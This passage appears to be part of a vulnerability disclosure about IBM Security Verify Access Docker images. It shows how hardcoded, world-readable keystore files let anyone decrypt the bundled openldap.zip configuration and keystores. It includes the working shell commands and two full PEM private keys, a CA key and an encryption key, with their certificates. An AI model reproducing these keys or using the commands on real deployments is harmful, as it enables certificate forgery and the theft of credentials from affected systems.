kali-docker# docker save 206efdd7809c > ibmcom/verify-access.tar
kali-docker# docker save 959f6f1095e9 > ibmcom/verify-access-dsc.tar

It was observed that instances contain custom encryption/decryption keys (device_key.kdb and device_key.sth files) located inside /var/.ca/.

These keys are used by the isva_decrypt utility present in all the images. For example, the /usr/sbin/bootstrap.sh script will decrypt the stored openldap.zip file using isva_decrypt:

Content of /usr/sbin/bootstrap.sh:

[...]
# Decrypt and extract the LDAP configuration. 
isva_decrypt $snapshot_tmp_dir/openldap.zip

unzip -q -o $snapshot_tmp_dir/openldap.zip -d /
[...]

When doing an analysis on the official IBM images obtained on Docker Hub, we can confirm the keys (device_key.kdb and device_key.sth) are in fact hardcoded inside these official IBM images and some of them are also world-readable by default:

kali-docker# ls -la */*/var/.ca/*            
-rw-r--r-- 1 root root 5991 Jun  8 01:29 _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb
-rw-r--r-- 1 root root  193 Jun  8 01:29 _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.sth
-rw-r--r-- 1 root root 5991 Jun  8 01:29 _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.kdb
-rw-r--r-- 1 root root  193 Jun  8 01:29 _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.sth
-rw------- 1 root root 5991 Jun  8 01:31 _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.kdb
-rw------- 1 root root  193 Jun  8 01:31 _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.sth
-rw-r--r-- 1 root root 5991 Jun  8 01:29 _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.kdb
-rw-r--r-- 1 root root  193 Jun  8 01:29 _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.sth

kali-docker# sha256sum */*/var/.ca/*|sort|uniq
dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce  _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.sth
dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce  _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.sth
dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce  _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.sth
dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce  _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.sth
f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935  _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb
f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935  _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.kdb
f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935  _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.kdb
f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935  _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.kdb

Using these keys and the IBM Crypto for C programs, we can successfully decrypt the openldap.zip file - an encrypted zip file - available inside the default.snapshot file - this file contains the entire configuration of ISVA and is stored inside Docker instances or retrieved over the network. The openldap.zip file contains all the configuration options of the instance and is consequently extremely sensitive (to decrypt it using isva_decrypt, it is required to create a /var/.ca directory containing device_key.kdb and device_key.sth in a test machine):

kali-decryption% LD_LIBRARY_PATH=/home/user/gsk8_64/lib64 strace ./isva_decrypt openldap.zip
[...]
writev(5, [{iov_base="", iov_len=0}, {iov_base="2s\0\0etc/openldap/schema/nis.ldif"..., iov_len=1024}], 2) = 1024
writev(5, [{iov_base="", iov_len=0}, {iov_base="\321\0\0etc/openldap/schema/collectiv"..., iov_len=1024}], 2) = 1024
writev(5, [{iov_base="", iov_len=0}, {iov_base="\0etc/openldap/slapd-replica.conf"..., iov_len=1024}], 2) = 1024
writev(5, [{iov_base="", iov_len=0}, {iov_base="data/secAuthority-default/__db.0"..., iov_len=1024}], 2) = 1024
read(4, "\271=b\223\205\320\277\365\207\302#T\255\355\374Ct\222\332M`3%\341\361I\301\233j\34\1\355"..., 8191) = 1124
writev(5, [{iov_base="", iov_len=0}, {iov_base="PK\1\2\36\3\24\0\0\0\10\0\4Z-UQ\202\212<V\2\0\0\0 \0\0000\0\30\0"..., iov_len=1024}], 2) = 1024
writev(5, [{iov_base="", iov_len=0}, {iov_base="+\0\30\0\0\0\0\0\0\0\0\0\200\201\256\213\7\0var/openldap/d"..., iov_len=1024}], 2) = 1024
read(4, "", 8191)                       = 0
close(4)                                = 0
write(5, "\5\0\3\250\302\36cux\v\0\1\4\0\0\0\0\4\0\0\0\0PK\5\6\0\0\0\0[\0"..., 44) = 44
close(5)                                = 0
unlink("openldap.zip")                  = 0
rename("/tmp/tmp.pxiQjh", "openldap.zip") = 0
unlink("/tmp/tmp.pxiQjh")               = -1 ENOENT (No such file or directory)
close(3)                                = 0
exit_group(0)                           = ?
+++ exited with 0 +++
kali-decryption% file openldap.zip 
openldap.zip: Zip archive data, at least v1.0 to extract, compression method=store

While doing an analysis of the zip file, we can find:

    • credentials;
    • passwords (e.g. in etc/openldap/dynamic/replica-1.conf and etc/openldap/dynamic/passwd.conf)
    • RSA keys + certificates (e.g. in etc/openldap/dynamic/server.key)
    • users in the logs.

The unique kdb files (encrypted archives containing public and private keys) found in the IBM Docker images have also been decrypted (using the corresponding stash files) and analyzed:

kali-docker# j=0; for file in ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/lum/iss-external.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/iss-external.kdb ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/opt/ibm/ldap/V6.4/etc/ldapkey.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/trial/trial_ca.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/isva.signing/isva_signing_public.kdb ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb; do echo $file; LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64/ /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/bin/gsk8capicmd_64 -cert -export -db $file -stashed -target /tmp/tmp.p12 -target_pw password ; openssl pkcs12 -in /tmp/tmp.p12 -out /tmp/export_${j}.pem -nodes -passin pass:password;j=$(($j+1));rm /tmp/tmp.p12;done
./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/lum/iss-external.kdb
./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/iss-external.kdb
./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/opt/ibm/ldap/V6.4/etc/ldapkey.kdb
./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/trial/trial_ca.kdb
./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/isva.signing/isva_signing_public.kdb
./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb

This allows an attacker to extract several private keys:

Bag Attributes
    friendlyName: ca
    localKeyID: 03 82 01 01 00 6F 9B 85 F2 CA 2A DC A3 2E BA F7 D9 36 40 D4 D4 4D 31 A4 AC 23 2E 6E F0 9F 04 90 D7 F5 EC D1 31 7C 39 DB 80 20 7D A2 6C F5 30 F1 B6 C0 8C 1D 9F 32 87 A0 84 FE 22 AC 8F 0E D8 36 03 6D 69 29 E2 57 0C B3 9B 05 C4 E0 1E 81 51 EB 33 49 C3 D3 E1 F2 4E C0 CA 0C 5A A8 F9 5D 54 1F CF BE C0 9A 70 C4 6F 94 65 70 14 9F 1B 74 29 6E EB 00 1F 55 9B FE A1 00 CC FB DC CD 20 35 64 DF D6 A5 A7 F4 FB 76 DB D5 AA 6D 67 08 B1 F8 0B 71 37 AF A2 90 C3 AA 57 38 5B 48 E7 AE 35 6C 0C 8A E3 99 7D 90 94 B0 F8 1E 13 17 F9 A9 2F 5F 87 35 8B F5 6D AC 64 89 28 B0 96 0B 6C FB B4 8E D9 F0 26 AD 61 35 F4 CB A4 59 F8 F6 A0 72 EB 82 CD CF 2D 85 63 CF C3 27 64 9F 52 07 05 D7 19 81 5A 57 4A 92 F5 3F 30 2D 87 BD FB 96 92 2B A0 93 E6 B8 E8 E5 90 27 70 A8 78 6F 1C 98 11 6E F9 70 60 0F 2C D8 4C 44 BF 
Key Attributes: <No Attributes>
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQC5d1UkBCpTmK74
01RqSKl42SInA0B8zgbLgZG+HPoniIgwzbu4lRJSFGaGjnuJH1ccWPvxuDtv5R26
X4EhnL9RewJiHDTq1RRnP/XqQja3uHwsKC4yUlyvhBcX+FcoTKzq4y724ZZs2GIM
+Q4d4OsXAomQz3TeEWT9tyr7gCgDJ8W3WvpEUE6mpvm0OPujFivAM9Ws6bY7zcZr
qjU4Nct//gq9qlZuKMWan68vE+yMqJAkCCLh6YG8EA+TU/TQP4cCeCIiUBBC6A1R
CMbCA9t7AgWTlJPxuPTdgTETLRXDlMJWhWxuTGWtkXrrSXaWIwBTk4XVfeK2xkYs
RPNFmBZ1AgMBAAECggEAIt1sA/lEe7KYMe6IT/KY6T7oTK0v0kZowJj67OJFpGjm
MUZ7o5diekubenAOiRh7J7kSo74ebkqD7CVIASmWTZryN79Vs0+bJk2/zOnln2Pu
894Z0RvqkJQkQz1MJSdE2mMa0Q5XWN7Uj9vB65v8lbbEZZSaQ6TBd3CXg+/zlaPy
MvRgK5XvrzCKWD9PtWpIb4nRssJhVDAgfPQf5tlQ05QhKagakxENVB6wmcvOiU2l
zYZDTUGFVfgd1OxH7JICaTfBlhncd2OYaHxr+sXrPGuI+Ckz/U5q6UU+/b5EYEPr
7BSlmptg6CCFLlJ/Mz3qzcm2Wd9/KWEEbwr7fRLcAQKBgQDIoEC54Fsdj07SHwaM
iWC72WysdBedH5DUM39cRiorYz/E5rFIKWz8c4Fz4sx0IkTqM2JvS1frtvPgMTTV
PvowBcLrLIIBj3ZktheAijCtB7g0FR8EBJpJvY3nPYYA08akeJ2wIrV/AdXiMGR+
dJXnJRmoVI6tdk/Y9xRfUuahqQKBgQDsp+v5PkMWYyRsja6cjN4K9bExRbPCMyXo
o3VisQXQYnVdKJE86g+PMiwY4KJksZ3ZPYduB4Hn+9qcKWRXkg/VbInE9+TxwBOT
E4cf1bUibtNZEF4JeV7/FE+K76RgxROufXpRlrTqlmzblIBIeA14sGCC/3unb6tV
mfCGe18l7QKBgQCs0g6vj2otrnMRYZR8nyJq7sJEU8S7nqNdh/bf/7j3owkdjjOM
m9K8LKuIrge8yoBe1mCmylo0PGcb6oc+Yn+VuoDLoI1k1rX/zzOzkFaZ1pqAkuki
xuw5NUX1ufOi5sqohxYe0edSPryFmXYX0EoI0NanQB+foNjrZvtvmbP98QKBgAHG
0PKyEPbeD6vw9FqghBo49feUumC+2Y4BjCQNiCmkU5U7dLusVimRCtu09AMlgjXb
TGT7EXKYZW++r84ofo3vnqkn40QdWQhFoUIP7KgxhMyqXspbaucnU+GLIwTG9frd
Xkm2g+0u6+pKFxx0KkW5rT/OgzMil3qxCSk5S+GRAoGAVzyS/rD6YInD7/vWUqwm
ttgKBm1d/uL2fMzx0KCnuKd5gJwfLIx9wDR4862VyWxOof8quqAWAthSGgg99Bjj
dujkG+fMEu+pYaxTmte0HSC4I+QTkQrOup4wtwVFz2t+0yPlmneQXmJ+K5Wu9ClR
uxhPVbNJYbPOs02by37UXn8=
-----END PRIVATE KEY-----
Bag Attributes
    friendlyName: encKey
    localKeyID: 03 82 01 01 00 BB 0F 22 30 06 39 08 3E 65 E7 67 A2 F7 A0 1A 96 6F A6 75 57 3E AF B0 64 7D 83 07 47 6C A3 CE 91 7D 11 94 B5 E9 F7 79 74 F0 22 AB 50 C7 49 66 5E 64 0C 63 07 B7 43 F2 35 52 E4 2C CC C0 1F B4 ED 2F 18 CB D3 A0 3C 3F 6D 07 88 AD B6 FE 52 2B EA 10 0C 9C 0A F4 04 21 20 95 E9 A7 39 E9 6F F1 83 11 5E B7 C5 D5 41 F8 D0 4B BC A2 D5 C6 1B E0 77 F4 91 F2 1B 23 25 17 42 29 19 3E CE 4E 39 12 E5 29 30 69 6A FE 47 BA E6 D8 D5 5E 3C 23 C6 B5 40 49 E5 64 7E 69 CC 43 E0 15 AE F5 DC D9 8C 27 6F 2E 09 25 85 C3 F8 95 44 12 42 6F C5 D1 E0 41 B2 F0 00 90 2C EA 36 05 1D DF F3 A3 B6 4F 42 E6 6D F2 33 BD 9F AE 3F 18 4E 79 08 35 BC 28 15 AC 23 0E B5 28 23 C2 08 3D 6A 39 5D 37 FA 60 13 EF 19 C3 7A 9C DB F0 19 0C AC 0D D0 51 B1 1B AE 22 A4 B7 92 3B FF 61 A3 0F 1C 6E 52 97 FE 2D 65 CB 13 
Key Attributes: <No Attributes>
-----BEGIN PRIVATE KEY-----
MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQDsJ4YkXiuJVyuD
N2Ibykd86ieUfIqlRJ4t0Z40CXkfcUoSYfGfEUl0vGa/hRV6dBgr0cvsP1Uuh8lM
x1k7AF2LZB/3Hf42MiN4b1BShCkU//UDjw3IJDblpDxAs6+wNHLjZ3Tmu4j8WPH6
szaEMmLKdAOVX3j4pElcoTwsozR+F+1XBcp9G+nhIymvTaskWy8Qi2EHl+M2qbrw
G9Iissr1wX3KnI5hxvHAtEflwFu1qIcQFdEo/nG6+45TzhuIUTep1jcqDKTFsuzM
DrlEPELGqHVhkYrUaCYUtiEOjZXcE6Hufy10nEjo3nARyKlIom3A9Gi8qscq9Xh3
R5JZZbEtAgMBAAECggEABB9RCrysBAAZuFSREk47s+NE5JGSN3klHESHzinuZphv
9piID0BX0/Ar6uo4aO+GXrj9fqHZi2ikR/12yW0NpjYhcMsr1geMTNkJXPex+wwJ
eQWaoEXeBk3bbGbfMzqrxUh/QgyJqpu48wZ7ROSIqF5DMYVPElkkSAHWmdvgUnQi
T5m+F+eq5dGYx82V/COXKzOKUd714o7uL6bPqnFbZlQLGbDnUruFLLNsktrVhMCH
f2n7vj2irRyehFB9iJWoQYzZRYnt7ZZwaiC5tM1FH08Ba9KWhKioV0euO8t2ojkt
VW3EKTx5qrxnKvchlgDzb9neb/p9PtFUy/AuB/3n6QKBgQDzv99rQUVVLsaTFK8A
UWzXfEB+su0vxK5Q8hpgF9EdOGLZQtTpl8/xIj5Np7OqVclQA7usx6t9mcJwjkdH
blUubDs8MOcvbxfjOos3LdZ4egOfiac7N4nMkjh1XUvUt0bvkNO+GtgDgsS16EiE
X9fsafsbkQYqsNd1qag4u5M9xQKBgQD4Be5dLZ0A62qQlaQA5Vl8bp8woL843qKC
PYGIEf5/sQX3oYRhM2En6RI4nMt6htPn7WB0T7vCCi+XEACnruAUJFEyZARpeGHG
5jx3p4p3l/QUxCgdzXceEJTjabesOOZSuPazjaj1RWoAU7fRTwnG+0msq15zlkqG
UjVnqsoESQKBgBheXl/CrsPNYVzi/HvzqAYDDg+co8nax/KfwbNJrkZVlMxTuiWA
X/GjkscAtR2aZf3x4ZlsfOCZtq66CrZBeZKij2l9Gh/L4398It7pXj+9Mw+IG4f4
DXa+R5a0NRiXGihpOkIPPPlc4X2uM1HIozWngstGvG8YLvI8e+zwE9BhAoGAf649
+YXjz3dh0rDWTwfCu4YPOW9nQZWLP1T+e9gXlhDBq6tghNF4cJ1RngdJ0Pfb2wee
ogHx/IBV44R/cdNa08OmcTR/+PPaEhSwiECdzddR9ebNaBo/+iA7JZ9kyKo6F9fU
WLbShgGIAkcW2A/CTsdKNDO8WfDCyMdFaurHONECgYA0e/5TN/+AGLktUd7VIlOC
5FCHkAGl4iHJn/3v5r8yfh55Otf+K9vIUrEGW9XEouIofLMapbKqxiTD7YCbrbsy
NyoRMUtmBWnh7yrWkl/gvLIRsAw1R248Q1uxLb0JytRyf/8vW0YOK1grDxnijULH
arClGP/McDNH4FD3S9dgJQ==
-----END PRIVATE KEY-----

And the corresponding certificates:

Bag Attributes
    friendlyName: ca
    localKeyID: 03 82 01 01 00 6F 9B 85 F2 CA 2A DC A3 2E BA F7 D9 36 40 D4 D4 4D 31 A4 AC 23 2E 6E F0 9F 04 90 D7 F5 EC D1 31 7C 39 DB 80 20 7D A2 6C F5 30 F1 B6 C0 8C 1D 9F 32 87 A0 84 FE 22 AC 8F 0E D8 36 03 6D 69 29 E2 57 0C B3 9B 05 C4 E0 1E 81 51 EB 33 49 C3 D3 E1 F2 4E C0 CA 0C 5A A8 F9 5D 54 1F CF BE C0 9A 70 C4 6F 94 65 70 14 9F 1B 74 29 6E EB 00 1F 55 9B FE A1 00 CC FB DC CD 20 35 64 DF D6 A5 A7 F4 FB 76 DB D5 AA 6D 67 08 B1 F8 0B 71 37 AF A2 90 C3 AA 57 38 5B 48 E7 AE 35 6C 0C 8A E3 99 7D 90 94 B0 F8 1E 13 17 F9 A9 2F 5F 87 35 8B F5 6D AC 64 89 28 B0 96 0B 6C FB B4 8E D9 F0 26 AD 61 35 F4 CB A4 59 F8 F6 A0 72 EB 82 CD CF 2D 85 63 CF C3 27 64 9F 52 07 05 D7 19 81 5A 57 4A 92 F5 3F 30 2D 87 BD FB 96 92 2B A0 93 E6 B8 E8 E5 90 27 70 A8 78 6F 1C 98 11 6E F9 70 60 0F 2C D8 4C 44 BF 
subject=C = us, O = ibm, OU = isam, CN = ca
issuer=C = us, O = ibm, OU = isam, CN = ca
-----BEGIN CERTIFICATE-----
MIIDNDCCAhygAwIBAgIINKDsXZO6zrowDQYJKoZIhvcNAQELBQAwNzELMAkGA1UE
BhMCdXMxDDAKBgNVBAoTA2libTENMAsGA1UECxMEaXNhbTELMAkGA1UEAxMCY2Ew
IBcNMTkwMzIxMDQ1NzAzWhgPMjEwMTA1MTEwNDU3MDNaMDcxCzAJBgNVBAYTAnVz
MQwwCgYDVQQKEwNpYm0xDTALBgNVBAsTBGlzYW0xCzAJBgNVBAMTAmNhMIIBIjAN
BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuXdVJAQqU5iu+NNUakipeNkiJwNA
fM4Gy4GRvhz6J4iIMM27uJUSUhRmho57iR9XHFj78bg7b+Udul+BIZy/UXsCYhw0
6tUUZz/16kI2t7h8LCguMlJcr4QXF/hXKEys6uMu9uGWbNhiDPkOHeDrFwKJkM90
3hFk/bcq+4AoAyfFt1r6RFBOpqb5tDj7oxYrwDPVrOm2O83Ga6o1ODXLf/4KvapW
bijFmp+vLxPsjKiQJAgi4emBvBAPk1P00D+HAngiIlAQQugNUQjGwgPbewIFk5ST
8bj03YExEy0Vw5TCVoVsbkxlrZF660l2liMAU5OF1X3itsZGLETzRZgWdQIDAQAB
o0IwQDAfBgNVHSMEGDAWgBRXaoj3HRsUC6I+wha3FcN9ng+jDDAdBgNVHQ4EFgQU
V2qI9x0bFAuiPsIWtxXDfZ4PowwwDQYJKoZIhvcNAQELBQADggEBAG+bhfLKKtyj
Lrr32TZA1NRNMaSsIy5u8J8EkNf17NExfDnbgCB9omz1MPG2wIwdnzKHoIT+IqyP
Dtg2A21pKeJXDLObBcTgHoFR6zNJw9Ph8k7AygxaqPldVB/PvsCacMRvlGVwFJ8b
dClu6wAfVZv+oQDM+9zNIDVk39alp/T7dtvVqm1nCLH4C3E3r6KQw6pXOFtI5641
bAyK45l9kJSw+B4TF/mpL1+HNYv1baxkiSiwlgts+7SO2fAmrWE19MukWfj2oHLr
gs3PLYVjz8MnZJ9SBwXXGYFaV0qS9T8wLYe9+5aSK6CT5rjo5ZAncKh4bxyYEW75
cGAPLNhMRL8=
-----END CERTIFICATE-----
Bag Attributes
    friendlyName: encKey
    localKeyID: 03 82 01 01 00 BB 0F 22 30 06 39 08 3E 65 E7 67 A2 F7 A0 1A 96 6F A6 75 57 3E AF B0 64 7D 83 07 47 6C A3 CE 91 7D 11 94 B5 E9 F7 79 74 F0 22 AB 50 C7 49 66 5E 64 0C 63 07 B7 43 F2 35 52 E4 2C CC C0 1F B4 ED 2F 18 CB D3 A0 3C 3F 6D 07 88 AD B6 FE 52 2B EA 10 0C 9C 0A F4 04 21 20 95 E9 A7 39 E9 6F F1 83 11 5E B7 C5 D5 41 F8 D0 4B BC A2 D5 C6 1B E0 77 F4 91 F2 1B 23 25 17 42 29 19 3E CE 4E 39 12 E5 29 30 69 6A FE 47 BA E6 D8 D5 5E 3C 23 C6 B5 40 49 E5 64 7E 69 CC 43 E0 15 AE F5 DC D9 8C 27 6F 2E 09 25 85 C3 F8 95 44 12 42 6F C5 D1 E0 41 B2 F0 00 90 2C EA 36 05 1D DF F3 A3 B6 4F 42 E6 6D F2 33 BD 9F AE 3F 18 4E 79 08 35 BC 28 15 AC 23 0E B5 28 23 C2 08 3D 6A 39 5D 37 FA 60 13 EF 19 C3 7A 9C DB F0 19 0C AC 0D D0 51 B1 1B AE 22 A4 B7 92 3B FF 61 A3 0F 1C 6E 52 97 FE 2D 65 CB 13 
subject=C = US, O = IBM, OU = GSKIT, CN = encKey
issuer=C = US, O = IBM, OU = GSKIT, CN = encKey
-----BEGIN CERTIFICATE-----
MIIEJjCCAw6gAwIBAgIIEuizp4Aw/w8wDQYJKoZIhvcNAQEFBQAwPDELMAkGA1UE
BhMCVVMxDDAKBgNVBAoTA0lCTTEOMAwGA1UECxMFR1NLSVQxDzANBgNVBAMTBmVu
Y0tleTAeFw0xOTAzMjEwNDU2NTlaFw0yOTAzMTkwNDU2NTlaMDwxCzAJBgNVBAYT
AlVTMQwwCgYDVQQKEwNJQk0xDjAMBgNVBAsTBUdTS0lUMQ8wDQYDVQQDEwZlbmNL
ZXkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDsJ4YkXiuJVyuDN2Ib
ykd86ieUfIqlRJ4t0Z40CXkfcUoSYfGfEUl0vGa/hRV6dBgr0cvsP1Uuh8lMx1k7
AF2LZB/3Hf42MiN4b1BShCkU//UDjw3IJDblpDxAs6+wNHLjZ3Tmu4j8WPH6szaE
MmLKdAOVX3j4pElcoTwsozR+F+1XBcp9G+nhIymvTaskWy8Qi2EHl+M2qbrwG9Ii
ssr1wX3KnI5hxvHAtEflwFu1qIcQFdEo/nG6+45TzhuIUTep1jcqDKTFsuzMDrlE
PELGqHVhkYrUaCYUtiEOjZXcE6Hufy10nEjo3nARyKlIom3A9Gi8qscq9Xh3R5JZ
ZbEtAgMBAAGjggEqMIIBJjCCASIGHCsGAQSD3OuTf4Pc65N/g9zrk3+r7CeDsWQC
pwkEggEARE7WVCtMEiBaqLgkERWOycU2QormaqloW2kdYi0iZT7NV/3tw0DNbcGK
pWdWfqtM4BM2x7Zq1ilGkK3NtGDnvRTBvrCFt0j/fU80/B9yBoELS0OWqKDkLiZi
enYORA427Y4JNYiRWngQCBPboqqp1oOB03dxujVH85W/3AniYol4fZBiUdYMfhWi
0sKxy5El/XDpYsA8w6ZQ0jz3/uQkNzY96A6QdO/4wB9P4YpKrl3XTKYGMtwoSW4b
QbXu2DOWvPZHxkXLizkeEk9/j+DC27nA7/ZIBNRV4pqOg2lo+7Po9XwwNyE2+1o2
4/2lwxPxDvGFYP05F78XHPEal8LgPTANBgkqhkiG9w0BAQUFAAOCAQEAuw8iMAY5
CD5l52ei96Aalm+mdVc+r7BkfYMHR2yjzpF9EZS16fd5dPAiq1DHSWZeZAxjB7dD
8jVS5CzMwB+07S8Yy9OgPD9tB4ittv5SK+oQDJwK9AQhIJXppznpb/GDEV63xdVB
+NBLvKLVxhvgd/SR8hsjJRdCKRk+zk45EuUpMGlq/ke65tjVXjwjxrVASeVkfmnM
Q+AVrvXc2Ywnby4JJYXD+JVEEkJvxdHgQbLwAJAs6jYFHd/zo7ZPQuZt8jO9n64/
GE55CDW8KBWsIw61KCPCCD1qOV03+mAT7xnDepzb8BkMrA3QUbEbriKkt5I7/2Gj
DxxuUpf+LWXLEw==
-----END CERTIFICATE-----

After the analysis of the certificates and the private keys, we were able to extract a CA private key and a private encryption/decryption key:

kali-docker# openssl x509 -in ca.pem -text -noout -modulus
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 3792290772900564666 (0x34a0ec5d93baceba)
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=us, O=ibm, OU=isam, CN=ca
        Validity
            Not Before: Mar 21 04:57:03 2019 GMT
            Not After : May 11 04:57:03 2101 GMT
        Subject: C=us, O=ibm, OU=isam, CN=ca
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:b9:77:55:24:04:2a:53:98:ae:f8:d3:54:6a:48:
                    a9:78:d9:22:27:03:40:7c:ce:06:cb:81:91:be:1c:
                    fa:27:88:88:30:cd:bb:b8:95:12:52:14:66:86:8e:
                    7b:89:1f:57:1c:58:fb:f1:b8:3b:6f:e5:1d:ba:5f:
                    81:21:9c:bf:51:7b:02:62:1c:34:ea:d5:14:67:3f:
                    f5:ea:42:36:b7:b8:7c:2c:28:2e:32:52:5c:af:84:
                    17:17:f8:57:28:4c:ac:ea:e3:2e:f6:e1:96:6c:d8:
                    62:0c:f9:0e:1d:e0:eb:17:02:89:90:cf:74:de:11:
                    64:fd:b7:2a:fb:80:28:03:27:c5:b7:5a:fa:44:50:
                    4e:a6:a6:f9:b4:38:fb:a3:16:2b:c0:33:d5:ac:e9:
                    b6:3b:cd:c6:6b:aa:35:38:35:cb:7f:fe:0a:bd:aa:
                    56:6e:28:c5:9a:9f:af:2f:13:ec:8c:a8:90:24:08:
                    22:e1:e9:81:bc:10:0f:93:53:f4:d0:3f:87:02:78:
                    22:22:50:10:42:e8:0d:51:08:c6:c2:03:db:7b:02:
                    05:93:94:93:f1:b8:f4:dd:81:31:13:2d:15:c3:94:
                    c2:56:85:6c:6e:4c:65:ad:91:7a:eb:49:76:96:23:
                    00:53:93:85:d5:7d:e2:b6:c6:46:2c:44:f3:45:98:
                    16:75
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Authority Key Identifier: 
                57:6A:88:F7:1D:1B:14:0B:A2:3E:C2:16:B7:15:C3:7D:9E:0F:A3:0C
            X509v3 Subject Key Identifier: 
                57:6A:88:F7:1D:1B:14:0B:A2:3E:C2:16:B7:15:C3:7D:9E:0F:A3:0C
    Signature Algorithm: sha256WithRSAEncryption
    Signature Value:
        6f:9b:85:f2:ca:2a:dc:a3:2e:ba:f7:d9:36:40:d4:d4:4d:31:
        a4:ac:23:2e:6e:f0:9f:04:90:d7:f5:ec:d1:31:7c:39:db:80:
        20:7d:a2:6c:f5:30:f1:b6:c0:8c:1d:9f:32:87:a0:84:fe:22:
        ac:8f:0e:d8:36:03:6d:69:29:e2:57:0c:b3:9b:05:c4:e0:1e:
        81:51:eb:33:49:c3:d3:e1:f2:4e:c0:ca:0c:5a:a8:f9:5d:54:
        1f:cf:be:c0:9a:70:c4:6f:94:65:70:14:9f:1b:74:29:6e:eb:
        00:1f:55:9b:fe:a1:00:cc:fb:dc:cd:20:35:64:df:d6:a5:a7:
        f4:fb:76:db:d5:aa:6d:67:08:b1:f8:0b:71:37:af:a2:90:c3:
        aa:57:38:5b:48:e7:ae:35:6c:0c:8a:e3:99:7d:90:94:b0:f8:
        1e:13:17:f9:a9:2f:5f:87:35:8b:f5:6d:ac:64:89:28:b0:96:
        0b:6c:fb:b4:8e:d9:f0:26:ad:61:35:f4:cb:a4:59:f8:f6:a0:
        72:eb:82:cd:cf:2d:85:63:cf:c3:27:64:9f:52:07:05:d7:19:
        81:5a:57:4a:92:f5:3f:30:2d:87:bd:fb:96:92:2b:a0:93:e6:
        b8:e8:e5:90:27:70:a8:78:6f:1c:98:11:6e:f9:70:60:0f:2c:
